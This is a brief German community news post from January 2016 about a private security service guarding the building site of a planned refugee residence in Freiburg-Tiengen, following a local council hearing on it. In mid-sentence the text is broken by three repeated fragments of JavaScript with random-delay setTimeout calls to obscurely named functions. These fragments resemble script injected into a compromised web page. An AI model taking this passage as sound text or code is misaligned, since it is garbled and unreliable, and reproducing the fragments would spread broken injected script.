Wachdienst für neue Flüchtlingsunterkunft

  • Redaktion
  • 19. Januar 2016

Als ich heute, am Di 19.1.2016, nach der Öffentliche Ortschaftsratssitzung zum Thema

„Bauantrag: Flst. Nr. 5298/0, Im Maierbrühl
Neubau eines Wohnheimes für Asylbewerber
Anhörung und Stellungnahme“

nach Hause ging, standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and schon ein Wachdienst gegenüber der Baustelle.
Ein Mann im PKW, der sagte, er sei von einem privaten Wachdienst und mit noch einem Kollegen würden Sie die Baustelle 24 Stunden überwachen.

Das war eine Bürgerfrage, die die Stadt Freiburg oder die Baufirma gelöst hat.

Martin Halle

 

Zeichnerischer Teil Flüchtlingsunterbringung in Freiburg-Tiengen

Anstehende Veranstaltungen

Sponsoren